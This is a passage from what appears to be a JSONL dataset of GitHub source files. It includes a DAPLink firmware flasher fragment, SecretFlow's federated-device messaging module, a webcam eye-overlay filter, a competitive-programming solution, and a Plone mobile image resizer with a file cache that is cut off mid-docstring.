self.ui.log.append(\"Finish flashing\")\n self.target.reset()\n else:\n QMessageBox.critical(self.window,\"ERROR\",\"Firmware is not exist\",QMessageBox.Yes)\n \n\n\n def progress_monitor(self, amount):\n print(\"progress\")\n print(amount)\n self.ui.progressBar.setValue(amount * 100)\n\n\n\n def update_daplink(self):\n self.ui.daplink_list.clear()\n probes = ConnectHelper.get_all_connected_probes(blocking=False)\n\n for probe in probes:\n self.ui.daplink_list.addItem(probe.description)\n if len(probes) > 0:\n self.probe = probes[0]\n else:\n self.probe = None\n \n def select_file(self):\n filepath, filetype = QFileDialog.getOpenFileName(\n self.window, \"open fireware\", \"./\", \"hex(*.hex);;bin(*.bin);;\")\n # print(fname)\n self.ui.filepath.setText(filepath)\n\n\nif __name__ == '__main__':\n Flash_Loader()\n\n","repo_name":"zhuangzuoyi/daplink_flasher","sub_path":"pyocd_target/flash_loader.py","file_name":"flash_loader.py","file_ext":"py","file_size_in_byte":4950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"886383203","text":"import logging\nimport threading\nfrom abc import ABC, abstractmethod\nfrom threading import Condition\nfrom typing import Any, Dict, List, Union\n\nimport fed\nimport ray\n\nimport secretflow.distributed as sfd\nfrom secretflow.device.driver import reveal\nfrom secretflow.distributed.primitive import DISTRIBUTION_MODE\n\nfrom .device import PYU\n\nthread_local = threading.local()\n\nSERVER = \"server\"\nCLIENT = \"client\"\n\n\ndef get_role():\n return thread_local.link.role\n\n\ndef get_device():\n return thread_local.link.device\n\n\ndef set_mesh(link: 'Link'):\n thread_local.link = link\n\n\ndef send_to_clients(name, value, version):\n \"\"\"Send message to the target device.\n this function is non-blocking.\n\n Args:\n name: message name\n value: message value\n version: message version, used to distinguish between different training rounds\n \"\"\"\n thread_local.link.send(name, value, thread_local.link._clients, version)\n\n\ndef send_to_server(name, value, version):\n \"\"\"Send message to the target device.\n this function is non-blocking.\n\n Args:\n name: message name\n value: message value\n version: message version, used to distinguish between different training rounds\n \"\"\"\n thread_local.link.send(name, value, thread_local.link._server, version)\n\n\ndef recv_from_clients(name, version):\n \"\"\"\n Receive messages from the source device.\n this function is blocking\n\n Args:\n name: message name\n version: TODO: What is the purpose of the version parameter?\n\n Returns:\n The received message\n \"\"\"\n return thread_local.link.recv(name, thread_local.link._clients, version)\n\n\ndef recv_from_server(name, version):\n \"\"\"\n Receive messages from the source device.\n this function is blocking\n\n Args:\n name: message name\n version: message version, used to distinguish between different training rounds\n\n Returns:\n The received message\n \"\"\"\n return thread_local.link.recv(name, thread_local.link._server, version)\n\n\nclass Communicator(ABC):\n @abstractmethod\n def send(dest: PYU, data: Any, key: str):\n raise NotImplementedError()\n\n @abstractmethod\n def recv(src: PYU, keys: Union[str, List[str]]):\n raise NotImplementedError()\n\n\nclass FedCommunicator(Communicator):\n def __init__(self, partners: List[PYU]):\n self.parties = [partner.party for partner in partners]\n\n def send(self, dest: PYU, data: Any, key: str):\n assert dest.party in self.parties, f'Device {dest} is not in this communicator.'\n return fed.send(\n dest_party=dest.party,\n data=data,\n upstream_seq_id=key,\n downstream_seq_id=key,\n )\n\n def recv(self, src: PYU, keys: Union[str, List[str]]):\n is_single = isinstance(keys, str)\n if is_single:\n keys = [keys]\n\n vals = ray.get([fed.recv(src.party, src.party, key, key) for key in keys])\n return vals[0] if is_single else vals\n\n\nclass RayCommunicator(Communicator):\n def __init__(self):\n self._messages = {}\n self._cv = Condition()\n\n def links(self, links: Dict[PYU, ray.actor.ActorHandle]):\n self._links = links\n\n def send(self, dest: PYU, data: Any, key: str):\n assert dest in self._links, f'Device {dest} is not in this communicator.'\n logging.debug(f'send to dest {dest}')\n self._links[dest]._recv_message.remote(key, data)\n\n def _recv_message(self, key: str, value: Any):\n \"\"\"Receive message\n\n Args:\n key: The message key, consisting by source & destination device,\n message name, and unique identifier\n value: message body\n \"\"\"\n logging.debug(f'receive message from remote: {key}')\n with self._cv:\n self._messages[key] = value\n self._cv.notifyAll()\n\n def recv(self, src: PYU, keys: Union[str, List[str]]):\n logging.debug(f'receive message: {keys}')\n\n is_single = isinstance(keys, str)\n if is_single:\n keys = [keys]\n vals = {}\n with self._cv:\n while True:\n recv_keys = []\n for k in keys:\n if k in self._messages:\n vals[k] = self._messages.pop(k)\n recv_keys.append(k)\n\n for k in recv_keys:\n keys.remove(k)\n\n if len(keys) == 0:\n break\n self._cv.wait()\n\n return list(vals.values())[0] if is_single else list(vals.values())\n\n\nclass Link:\n \"\"\"A helper class for communication inside actor between several actors.\n\n You should not use this class directly but inherit it and decorate your\n child class with :py:meth:`~secretflow.device.proxy`.\n\n Examples\n --------\n >>> from secretflow.device import proxy\n >>> from seceretflow.device.link import Link, init_link\n >>>\n >>> @proxy\n >>> class PS(Link):\n >>> def run(self):\n >>> pass\n >>>\n >>>\n >>> @proxy\n >>> class Client(Link):\n >>> def run(self):\n >>> pass\n >>>\n >>> ps = PS()\n >>> clients = [Client() for i in range(2)]\n >>> init_link(ps, clients)\n >>> for client in clients:\n >>> init_link(client, ps)\n >>>\n \"\"\"\n\n def __init__(self, device: PYU, key_prefix: str = ''):\n \"\"\"Initialize\n\n Args:\n device: where this Link instance located, PYU\n \"\"\"\n self._device = device\n self._initialized = False\n self._clients = None\n self._server = None\n self._key_prefix = key_prefix\n self._comm = None\n\n def initialize(\n self, comm_or_links: Union[Communicator, Dict[PYU, ray.actor.ActorHandle]]\n ):\n if isinstance(comm_or_links, FedCommunicator):\n self._comm = comm_or_links\n else:\n self._comm = RayCommunicator()\n self._comm.links(comm_or_links)\n # Indicate success.\n return True\n\n @staticmethod\n def _create_key(\n src_device: Union[PYU, List[PYU]],\n dst_device: Union[PYU, List[PYU]],\n name: str,\n step_id: int = 0,\n key_prefix='',\n ):\n if isinstance(src_device, PYU) and isinstance(dst_device, PYU):\n return f'{key_prefix};{src_device};{dst_device};{name};{step_id}'\n elif isinstance(src_device, List):\n assert isinstance(dst_device, PYU), f'invalid dst_device: {dst_device}'\n return [\n f'{key_prefix};{device};{dst_device};{name};{step_id}'\n for device in src_device\n ]\n elif isinstance(dst_device, List):\n assert isinstance(src_device, PYU), f'invalid src_device: {src_device}'\n return [\n f'{key_prefix};{src_device};{device};{name};{step_id}'\n for device in dst_device\n ]\n else:\n assert False, f'invalid src_device: {src_device}, dst_device: {dst_device}'\n\n @property\n def clients(self):\n return self._clients\n\n @clients.setter\n def clients(self, clients: List[PYU]):\n self._clients = clients\n\n @property\n def server(self):\n return self._server\n\n @server.setter\n def server(self, server: PYU):\n self._server = server\n\n def send(\n self, name: str, value: Any, dst_device: Union[PYU, List[PYU]], step_id: int = 0\n ):\n \"\"\"Send message to target device.\n this function is non-blocking\n\n Args:\n name: message name\n value: message value\n dst_device: target device(s), can be a single device or a list of devices\n step_id: A process-level unique identifier to identify the communication\n \"\"\"\n assert isinstance(dst_device, PYU) or (\n isinstance(dst_device, List) and len(dst_device) > 0\n ), f'dst_device must be PYU or PYU list'\n\n key = self._create_key(\n self._device, dst_device, name, step_id, self._key_prefix\n )\n logging.debug(f'send message: {key}')\n\n if isinstance(dst_device, list):\n for msg_id, device in zip(key, dst_device):\n self._comm.send(device, value, msg_id)\n else:\n self._comm.send(dst_device, value, key)\n\n def _recv_message(self, key: str, value: Any):\n \"\"\"Receive message\n\n Args:\n key: The message key, consisting by source & destination device,\n message name, and unique identifier\n value: message body\n \"\"\"\n logging.debug(f'receive message from remote: {key}')\n self._comm._recv_message(key, value)\n\n def recv(\n self, name: str, src_device: Union[PYU, List[PYU]], step_id: int = 0\n ) -> Any:\n \"\"\"Receive messages from the source device.\n this function is blocking\n\n Args:\n name: The message name\n src_device: source device(s), can be a single device or a list of devices\n step_id: A process-level unique identifier to identify the communication\n\n Returns:\n The received message\n \"\"\"\n assert isinstance(src_device, PYU) or (\n isinstance(src_device, List) and len(src_device) > 0\n ), f'dst_device must be PYU or PYU list'\n\n key = self._create_key(\n src_device, self._device, name, step_id, self._key_prefix\n )\n logging.debug(f'receive message: {key}')\n return self._comm.recv(src=self._device, keys=key)\n\n\ndef init_link(link: Link, partners: List[Link]):\n if not isinstance(partners, list):\n partners = [partners]\n if sfd.get_distribution_mode() == DISTRIBUTION_MODE.PRODUCTION:\n comm = FedCommunicator([partner.device for partner in partners])\n # Use `get` here as a barrier to make sure that initialize is done at first.\n # Note that link should be a `proxy`ed actor.\n reveal(link.initialize(comm))\n else:\n reveal(link.initialize({partner.device: partner.data for partner in partners}))\n","repo_name":"secretflow/secretflow","sub_path":"secretflow/device/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":10133,"program_lang":"python","lang":"en","doc_type":"code","stars":2029,"dataset":"github-code","pt":"5"} +{"seq_id":"6201034943","text":"import cv2\nimport numpy as np\nimport dlib\nfrom math import hypot\n\n# Loading Camera and Nose image and Creating mask\ncap = cv2.VideoCapture(0)\nleft_eye = cv2.imread(\"ojo_izq.png\")\nright_eye = cv2.imread(\"ojo_der.png\")\n_, frame = cap.read()\nrows, cols, _ = frame.shape\nl_eye_mask = np.zeros((rows, cols), np.uint8)\nr_eye_mask = np.zeros((rows, cols), np.uint8)\n# Loading Face detector\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\nwhile True:\n _, frame = cap.read()\n l_eye_mask.fill(0)\n r_eye_mask.fill(0)\n gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = detector(frame)\n for face in faces:\n landmarks = predictor(gray_frame, face)\n # Nose coordinates\n top_left_eye = (landmarks.part(43).x, landmarks.part(43).y)\n bot_left_eye = (landmarks.part(47).x, landmarks.part(47).y)\n left_left_eye = (landmarks.part(42).x, landmarks.part(42).y)\n right_left_eye = (landmarks.part(45).x, landmarks.part(45).y)\n\n left_eye_width = round(abs(left_left_eye[0] - right_left_eye[0] * 1.05))\n left_eye_height = round(abs(top_left_eye[1] - bot_left_eye[1] * 1.05))\n\n top_right_eye = (landmarks.part(38).x, landmarks.part(38).y)\n bot_right_eye = (landmarks.part(40).x, landmarks.part(40).y)\n left_right_eye = (landmarks.part(36).x, landmarks.part(36).y)\n right_right_eye = (landmarks.part(39).x, landmarks.part(39).y)\n\n right_eye_width = round(abs(left_right_eye[0] - right_right_eye[0] * 1.05))\n right_eye_height = round(abs(top_right_eye[1] - bot_right_eye[1] * 1.05))\n # New left nose position\n left_e_top_left = (left_left_eye[0]), int((right_left_eye[1] - left_eye_height / 2))\n left_e_bottom_right = (right_left_eye[0]), int((right_left_eye[1] + left_eye_height / 2))\n # New right nose position\n right_e_top_left = (left_right_eye[0]), int((right_right_eye[1] - right_eye_height / 2))\n right_e_bottom_right = (right_right_eye[0]), int((right_right_eye[1] + right_eye_height / 2))\n\n # Adding the new left eye\n\n l_eye = cv2.resize(left_eye, (left_eye_width, left_eye_height))\n r_eye = cv2.resize(right_eye, (right_eye_width, right_eye_height))\n l_eye_gray = cv2.cvtColor(l_eye, cv2.COLOR_BGR2GRAY)\n r_eye_gray = cv2.cvtColor(r_eye, cv2.COLOR_BGR2GRAY)\n _, l_eye_mask = cv2.threshold(l_eye_gray, 200, 255, cv2.THRESH_BINARY)\n _, l_eye_mask_inv = cv2.threshold(l_eye_gray, 200, 255, cv2.THRESH_BINARY_INV)\n\n _, r_eye_mask = cv2.threshold(r_eye_gray, 200, 255, cv2.THRESH_BINARY)\n _, r_eye_mask_inv = cv2.threshold(r_eye_gray, 200, 255, cv2.THRESH_BINARY_INV)\n\n l_eye_area = frame[left_e_top_left[1]: left_e_top_left[1] + left_eye_height,\n left_e_top_left[0]: left_e_top_left[0] + left_eye_width]\n r_eye_area = frame[right_e_top_left[1]: right_e_top_left[1] + right_eye_height,\n right_e_top_left[0]: right_e_top_left[0] + right_eye_width]\n cv2.imshow(\"l_eye_mask\", l_eye_mask)\n l_eye_area_no_eye = cv2.bitwise_and(l_eye_area, l_eye_area, mask = l_eye_mask)\n l_eye_no_back = cv2.bitwise_and(l_eye, l_eye, mask=l_eye_mask_inv)\n\n r_eye_area_no_eye = cv2.bitwise_and(r_eye_area, r_eye_area, mask=r_eye_mask)\n r_eye_no_back = cv2.bitwise_and(r_eye, r_eye, mask=r_eye_mask_inv)\n\n cv2.imshow(\"l_Eye no eye\", l_eye_area_no_eye)\n final_l_eye = cv2.add(l_eye_no_back, l_eye_area_no_eye)\n final_r_eye = cv2.add(r_eye_no_back, r_eye_area_no_eye)\n cv2.imshow(\"Nose area\", l_eye_area)\n\n frame[left_e_top_left[1]: left_e_top_left[1] + left_eye_height,\n left_e_top_left[0]: left_e_top_left[0] + left_eye_width] = final_l_eye\n frame[right_e_top_left[1]: right_e_top_left[1] + right_eye_height,\n right_e_top_left[0]: right_e_top_left[0] + right_eye_width] = final_r_eye\n cv2.imshow(\"Nose pig\", l_eye)\n cv2.imshow(\"final nose\", final_l_eye)\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1)\n if key == 27:\n break","repo_name":"abrahamdaf/semana_tec_filtro","sub_path":"Eye_filter/Crying_eyes.py","file_name":"Crying_eyes.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27382853424","text":"# Author Name: Ajay Meena\n# Codeforce : https://codeforces.com/profile/majay1638\nimport sys\nimport math\nimport bisect\nimport heapq\nfrom bisect import bisect_right\nfrom sys import stdin, stdout\n\n# -------------- INPUT FUNCTIONS ------------------\n\n\ndef get_ints_in_variables(): return map(\n int, sys.stdin.readline().strip().split())\n\n\ndef get_int(): return int(sys.stdin.readline())\n\n\ndef get_ints_in_list(): return list(\n map(int, sys.stdin.readline().strip().split()))\ndef get_list_of_list(n): return [list(\n map(int, sys.stdin.readline().strip().split())) for _ in range(n)]\n\n\ndef get_string(): return sys.stdin.readline().strip()\n\n# -------------- SOLUTION FUNCTION ------------------\n\n\ndef Solution(a, b, n):\n # Write Your Code Here\n onesCount = 0\n zeroCount = 0\n for c in a:\n if c == \"1\":\n onesCount += 1\n else:\n zeroCount += 1\n\n if a == b:\n print(\"YES\")\n else:\n flag = True\n changed = False\n for i in range(n-1, -1, -1):\n if ((a[i] != b[i] and not changed) or (a[i] == b[i] and changed)):\n if(zeroCount == onesCount):\n changed = not changed\n else:\n flag = False\n break\n if a[i] == \"1\":\n onesCount -= 1\n else:\n zeroCount -= 1\n if flag:\n print(\"YES\")\n else:\n print(\"NO\")\n\n\ndef main():\n # Take input Here and Call solution function\n for _ in range(get_int()):\n n = get_int()\n a = get_string()\n b = get_string()\n Solution(a, b, n)\n\n\n# calling main Function\nif __name__ == '__main__':\n main()\n","repo_name":"hacetheworld/competitive-programming-practices","sub_path":"contests/codeforce/div2/712/B_Flip_the_Bits.py","file_name":"B_Flip_the_Bits.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"11154174885","text":"\"\"\"\n\n Caching mobile image resizer.\n\n Resizer both Zope internal and arbitary URL image resources.\n\n\"\"\"\n\n\n__license__ = \"GPL 2\"\n__copyright__ = \"2010 mFabrik Research Oy\"\n__author__ = \"Mikko Ohtamaa \"\n__docformat__ = \"epytext\"\n\nimport os\nimport md5\nimport urllib\nimport logging\nimport shutil\nfrom cStringIO import StringIO\n\nfrom AccessControl import Unauthorized\nfrom Acquisition import aq_inner\nimport zope.interface\n\nfrom zope.interface import implements\nfrom zope.component import getMultiAdapter, getUtility, queryUtility\nfrom zope.app.container.interfaces import INameChooser\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom Products.Five.browser import BrowserView\nfrom Products.statusmessages.interfaces import IStatusMessage\nfrom Products.CMFPlone.browser import ploneview\nfrom Products.CMFCore.utils import getToolByName\nfrom zope.app.component.hooks import getSite\nfrom plone.app.redirector.storage import RedirectionStorage\n\nfrom mobile.sniffer.utilities import get_user_agent, get_user_agent_hash\n\nfrom mobile.htmlprocessing.transformers.imageresizer import ImageResizer\n\nfrom gomobile.mobile.interfaces import IMobileImageProcessor, IUserAgentSniffer\nfrom gomobile.mobile.interfaces import IMobileRequestDiscriminator, MobileRequestType\nfrom gomobile.imageinfo.interfaces import IImageInfoUtility\nfrom gomobile.mobile.utilities import getMobileProperties\n\n# To not exceed this resize dimensions\nsafe_width = 1000\nsafe_height = 1000\n\nlogger = logging.getLogger(\"Resizer\")\n\n# Debug variable for unit tests\ncache_hits = 0\n\nDEFAULT_CACHE_PATH=\"/tmp/gomobile_image_cache\"\n\nVIEW_NAME = \"@@mobile_image_processor\"\n\nclass FSCache(object):\n \"\"\" Simple balanced folder based file system cache for images.\n\n Use cron job + timestamps to invalidate the cache.\n\n Each file path and name is hex digest of MD5 calculated from the cache key.\n Files are created in folder structure nested two levels to avoid too many files per one folder::\n\n DEFAULT_CACHE_PATH/00/00/000012341234\n DEFAULT_CACHE_PATH/00/10/001012341234\n DEFAULT_CACHE_PATH/10/00/100012341234\n DEFAULT_CACHE_PATH/10/10/101012341234\n\n \"\"\"\n def __init__(self, root_path):\n self.root_path = root_path\n\n def makePathKey(self, ob):\n \"\"\"\n Calculate hex digest.\n \"\"\"\n ikey = str(ob)\n return md5.new(ikey).hexdigest()\n\n def get(self, key, default=None):\n \"\"\" Get the cached file and update its timestamp.\n\n @return: Path to cached file or None if not cached\n \"\"\"\n\n global cache_hits\n\n logger.debug(\"Checking resizer image cache for \" + key)\n\n work_dir, path = self.getOrCreatePath(key)\n if not os.path.exists(path):\n return default\n else:\n\n # http://stackoverflow.com/questions/1158076/implement-touch-using-python\n # We set both access time and modified time, as the file may be\n # on relatime file system\n os.utime(path, None)\n cache_hits += 1\n return path\n\n def getOrCreatePath(self, key):\n \"\"\"\n @return: tuple (work dir path, final file path)\n \"\"\"\n path1 = key[0:2]\n path2 = key[2:4]\n\n # TODO: Do this only once and get rid of this\n #fspermissions.ensure_writable_folder(storage_folder)\n #fspermissions.ensure_writable_folder(os.path.join(storage_folder, path1))\n #fspermissions.ensure_writable_folder(os.path.join(storage_folder, path1, path2))\n path = os.path.join(self.root_path, path1, path2)\n\n if not os.path.exists(path):\n os.makedirs(path, 0x1FF)\n\n full_path = os.path.join(path, key)\n\n return path, full_path\n\n def makeTempFile(self, work_path):\n \"\"\"\n \"\"\"\n return os.path.join(work_path, os.tmpnam())\n\n\n def closeTempFile(self, temp, full):\n \"\"\" Perform final cache set as atomic FS operation.\n \"\"\"\n logger.debug(\"Created image cache file:\" + full)\n #os.rename(temp, full)\n # Fix for freebsd http://code.google.com/p/plonegomobile/issues/detail?id=9\n shutil.move(temp, full)\n\n def set(self, key, value):\n \"\"\"\n \"\"\"\n work_path, file_path = self.getOrCreatePath(key)\n\n # Create a cached copy\n temp = self.makeTempFile(work_path)\n file = open(temp, \"wb\")\n file.write(value)\n file.close()\n\n self.closeTempFile(temp, file_path)\n\n def invalidate(self):\n \"\"\" Nuke all files from the cache.\n\n One should do something smarter here.\n \"\"\"\n if os.path.exists(self.root_path):\n shutil.rmtree(self.root_path)\n\nclass HTMLMutator(ImageResizer):\n \"\"\"\n Rewrite in HTML content code.\n\n Use mobile.htmlprocessing package and provide Plone specific callbacks.\n \"\"\"\n\n def __init__(self, baseURL, trusted, rewriteCallback):\n ImageResizer.__init__(self, baseURL, trusted)\n self.rewriteCallback = rewriteCallback\n\n def rewrite(self, url):\n return self.rewriteCallback(url)\n\nclass MobileImageProcessor(object):\n\n zope.interface.implements(IMobileImageProcessor)\n\n def __init__(self, context, request):\n self.context = context\n self.request = request\n\n def init(self):\n self.site = getSite()\n self.cache = FSCache(self.getCachePath())\n\n def getSecret(self):\n \"\"\" Avoid properties look up using cached value.\n\n @return: Unguessable string, unique to a site\n \"\"\"\n _secret = self.site.portal_properties.mobile_properties.image_resizer_secret\n return _secret\n\n\n def calculateSignature(self, **kwargs):\n \"\"\" Calculate protected MD5 for resizing parameters, so that input is protected against DoS attack \"\"\"\n\n logger.debug(\"Calculating signature from params:\" + str(kwargs))\n\n # Sort parameters by key name, as MD5 function\n # is sensitive to the order of the parameters\n # and Python dict does not guarantee the order\n params = list(kwargs.items())\n\n def key_comparison(x, y):\n \"\"\"\n \"\"\"\n return cmp(x[0], y[0])\n\n params.sort(key_comparison)\n\n concat = \"\"\n for key, value in params:\n concat += key + \"=\" + str(value)\n concat += self.getSecret()\n return md5.new(concat).hexdigest()\n\n def isUserAgentSpecific(self, url, properies):\n \"\"\" Determine whether the result of resize may vary by user agent.\n\n If we need to vary by user agent, insert a string based\n on HTTP_USER_AGENT to the resizer GET query.\n \"\"\"\n return True\n\n def finalizeViewArguments(self, properties):\n \"\"\"\n Make sure that input parameters are URL compliant.\n \"\"\"\n for key, val in properties.items():\n properties[key] = str(val)\n\n # Make it so that no one else can guess working resizer URLs\n secret = self.calculateSignature(**properties)\n properties[\"secret\"] = secret\n return properties\n\n def removeScale(self, imagePath):\n \"\"\"\n Helper function to remove scale view name from the image path.\n\n @param imagePath: Site root relative path to the image as list.\n \"\"\"\n last = imagePath[-1]\n\n # Assume ATContentType image scales\n if last.startswith(\"image_\"):\n imagePath = imagePath[0:-1]\n\n return imagePath\n\n def mapURL(self, url):\n \"\"\" Make image URL relative to site root.\n\n If possible, make URI relative to site root\n so that we can safely pass it around from a page to another.\n\n If URL is absolute, don't touch it.\n\n @param url: Image URL or URI as a string\n \"\"\"\n\n rs = RedirectionStorage()\n if rs.has_path(url):\n url = rs.get(url)\n\n\n # Make sure we are traversing the context chain without view object messing up things\n context = self.context.aq_inner\n\n if url.startswith(\"http://\") or url.startswith(\"https://\"):\n # external URL\n url = url\n elif \"++resource\" in url:\n # Zope 3 resources are mapped to the site root\n url = url\n else:\n # Map the context path to the site root\n if url.startswith(\"/\"):\n # Pass URL to resizer view relocated to the site root\n\n url = url[1:]\n else:\n # The URL is relative to the context path\n # Map URL to be relative to the site root\n\n site = getSite()\n\n # check if the context is folderish so that we can\n # traverse from the parent if it's not\n folderish = getattr(aq_base(context), 'isPrincipiaFolderish',\n False)\n try:\n if folderish:\n imageObject = context.unrestrictedTraverse(url)\n else:\n imageObject = \\\n context.aq_parent.unrestrictedTraverse(url)\n except Unauthorized:\n # The parent folder might be private and the image\n # public, in which case we should be able to view\n # the image after all.\n parent_path = '/'.join(url.split('/')[:-1])\n image_path = url.split('/')[-1]\n parent = site.unrestrictedTraverse(parent_path)\n imageObject = parent.restrictedTraverse(image_path)\n\n if (\"FileResource\" in imageObject.__class__.__name__):\n # Five mangling compatible way to detect image urls pointing to the resource directory\n # ...but this should not happen if images are accessed using ++resource syntax\n return url\n elif hasattr(imageObject, \"getPhysicalPath\"):\n physicalPath = imageObject.getPhysicalPath() # This path is relative to Zope Application server root\n#\n virtualPath = self.request.physicalPathToVirtualPath(physicalPath)\n\n # TODO: Assume Plone site is Zope app top level root object here\n\n # empty root node, site node\n assert len(physicalPath) > 2\n\n virtualPath = physicalPath[2:]\n\n virtualPath = self.removeScale(virtualPath)\n\n url = \"/\".join(virtualPath)\n else:\n raise RuntimeError(\"Unknown traversable image object:\" + str(imageObject))\n return url\n\n def getImageDownloadURL(self, url, properties={}):\n \"\"\"\n Return download URL for image which is put through image resizer.\n\n @param url: Source image URI, relative to context, or absolite URL\n\n @param properties: Extra options needed to be given to the resizer, e.g. padding, max width, etc.\n\n @return: String, URL where to resized image can be downloaded. This URL varies\n by the user agent.\n \"\"\"\n self.init()\n\n url = self.mapURL(url)\n\n # Prepare arguments for the image resizer view\n new_props = {\"conserve_aspect_ration\" : \"true\"}\n new_props.update(properties)\n new_props[\"url\"] = url\n\n if self.isUserAgentSpecific(url, new_props):\n # Check if the result may vary by user agnt\n new_props[\"user_agent_md5\"] = get_user_agent_hash(self.request)\n\n new_props = self.finalizeViewArguments(new_props)\n\n return self.site.absolute_url() + \"/\" + VIEW_NAME + \"?\" + urllib.urlencode(new_props)\n\n\n def processHTML(self, data, trusted):\n \"\"\" Process all tags in HTML code.\n\n Some error filtering is performed for incoming string data,\n as there are some common cases related to browser based WYSIWYG\n which will make shit hit the fan.\n\n @param base_url: Base URL of HTML document - for resolving relative img paths\n\n @return: Mutated HTML output as a string\n \"\"\"\n\n self.init()\n\n base = self.context.absolute_url()\n\n # create mobile.heurestics helper\n mutator = HTMLMutator(base, trusted, self.getImageDownloadURL)\n\n if type(data) == str:\n data = unicode(data, \"utf-8\", errors=\"ignore\")\n\n # Need to fix Windows style new lines here or they will cause extra new lines in the output\n data = data.replace(u\"\\r\", u\"\")\n\n # Need to fix Unicode non-breaking space bar ( ) or it will be escaped in the output and appears wrong\n # Use XML/XHTML entity   to present this evil character\n data = data.replace(u\"\\xA0\", u\" \")\n\n processed = mutator.process(data)\n\n return processed\n\n def getCachePath(self):\n \"\"\"\n @return: FS path where cached resized scales are stored\n \"\"\"\n image_resize_cache_path = getattr(self.context.portal_properties.mobile_properties, \"image_resize_cache_path\", DEFAULT_CACHE_PATH)\n return image_resize_cache_path\n\n\n\nclass ResizeViewHelper(BrowserView):\n \"\"\"\n Base class from where you can derivate your own image resizers or call this as a helper from your own views.\n\n \"\"\"\n\n def init(self):\n\n self.resizer = getMultiAdapter((self.context, self.request), IMobileImageProcessor)\n self.resizer.init()\n\n sniffer = getMultiAdapter((self.context, self.request), IUserAgentSniffer)\n self.ua = sniffer.getUserAgentRecord()\n\n\n def buildCacheKey(self, width, height):\n \"\"\"\n Build cache key for result image data.\n\n This varies by width and height if we know them.\n If we don't know, then we user agent string itself as a part of the key,\n so that different mobiles don't get wrong image from the cache.\n \"\"\"\n\n # We know the user agent so we know the resulting width and height in this stage\n if self.ua:\n key = str(width) + \"-\" + str(height) + \"-\"\n else:\n key = get_user_agent_hash(self.request)\n\n def add_param(key, value):\n key += \"-\"\n key += str(value)\n return key\n\n key = add_param(key, self.cache_key)\n key = add_param(key, self.conserve_aspect_ration)\n key = add_param(key, self.padding_width)\n\n return key\n\n def parseParameters(self, parameters):\n \"\"\" Parse parameters needed for\n\n \"\"\"\n self.width = parameters.get(\"width\", \"auto\")\n self.height = parameters.get(\"height\", \"auto\")\n self.padding_width = parameters.get(\"padding_width\", 0)\n self.conserve_aspect_ration = parameters.get(\"conserve_aspect_ration\", False)\n\n self.image = parameters.get(\"image\", None)\n self.url = parameters.get(\"url\", None)\n\n if not(self.image or self.url):\n raise RuntimeError(\"Needs either image or URL parameter\")\n\n self.cache_key = parameters.get(\"cache_key\", self.url)\n if not self.cache_key:\n raise RuntimeError(\"cache_key or URL parameter must be provided\")\n\n def resolveCacheFormat(self, data):\n \"\"\"\n Peek cached file first bytes to get the format.\n \"\"\"\n if data[0:3] == \"PNG\":\n return \"png\"\n elif data[0:3] == \"GIF\":\n return \"gif\"\n else:\n return \"jpeg\"\n\n\n def serve(self, width, height):\n \"\"\" Generate resized image or fetch one from cache.\n\n TODO: Clear up string / StringIO madness here in all those ifs\n \"\"\"\n key = self.buildCacheKey(width, height)\n path = self.resizer.cache.makePathKey(key)\n logger.debug(\"Performing mobile image resize cache look up \" + key + \" mapped to \" + path)\n\n file = self.resizer.cache.get(path)\n if file:\n f = open(file, \"rb\")\n data = f.read()\n f.close()\n format = self.resolveCacheFormat(data)\n value = data\n else:\n tool = getUtility(IImageInfoUtility)\n\n logger.debug(\"Resizing image to mobile dimensions %d %d\" % (width, height))\n\n if self.url:\n data, format = tool.getURLResizedImage(self.url, width, height, conserve_aspect_ration=self.conserve_aspect_ration)\n else:\n data, format = tool.resizeImage(self.image, width, height, conserve_aspect_ration=self.conserve_aspect_ration)\n\n # Mercifully cache broken images from remote HTTP downloads\n if data is None:\n value = \"\"\n else:\n value = data.getvalue()\n\n self.resizer.cache.set(path, value)\n\n if value == \"\":\n # We could not access the orignal image data\n self.request.response.setHeader(\"Content-type\", \"text/plain\")\n return \"Image resize error\"\n\n self.request.response.setHeader(\"Content-type\", \"image/\" + format)\n\n # TODO: Check whether we can stream response (no memory buffering)\n\n if hasattr(data, \"getvalue\"):\n # Looks like ZMedusa server cannot stream data to the client...\n # so we need to return it as memory buffered\n return data.getvalue()\n\n return data\n\n def resolveDimensions(self):\n \"\"\" Calculate final dimensions for the image.\n \"\"\"\n\n if self.ua:\n logger.debug(\"Using user agent:\" + str(self.ua.getMatchedUserAgent()))\n else:\n logger.debug(\"No user agent available for resolving the target image size\")\n\n if self.ua:\n canvas_width = self.ua.get(\"usableDisplayWidth\")\n canvas_height = self.ua.get(\"usableDisplayHeight\")\n else:\n canvas_width = None\n canvas_height = None\n\n # Fill in default info if user agent records are incomplete\n if not canvas_width:\n canvas_width = self.context.portal_properties.mobile_properties.default_canvas_width\n\n if not canvas_height:\n canvas_height = self.context.portal_properties.mobile_properties.default_canvas_height\n\n\n # Solve wanted width\n if self.width == \"auto\":\n width = canvas_width\n else:\n width = self.width\n\n # Make sure we have some margin available if defined\n width -= self.padding_width\n\n # Solve wanted height\n if self.height == \"auto\":\n height = canvas_height\n else:\n # Defined as a param\n height = self.height\n\n if width < 1 or width > safe_width:\n raise Unauthorized(\"Invalid width: %d\" % width)\n\n if height < 1 or height > safe_height:\n raise Unauthorized(\"Invalid height: %d\" % height)\n\n return width, height\n\n def __call__(self, parameters):\n\n self.init()\n self.parseParameters(parameters)\n width, height = self.resolveDimensions()\n return self.serve(width, height)\n\n\nclass ResizeView(ResizeViewHelper):\n \"\"\" Resizer view for arbitary images looked up by URL or Zope path.\n\n Automatic width or height parameter can be used. In this case\n we see whether we have sniffed the mobile screen size based\n on user agent sniffer middle. Use mobile browser canvas\n dimension in this case.\n\n If width/height is automatic, but no browser information is available\n fallback to default setting set in mobile_properties.\n\n HTTP GET query parameters are generated by 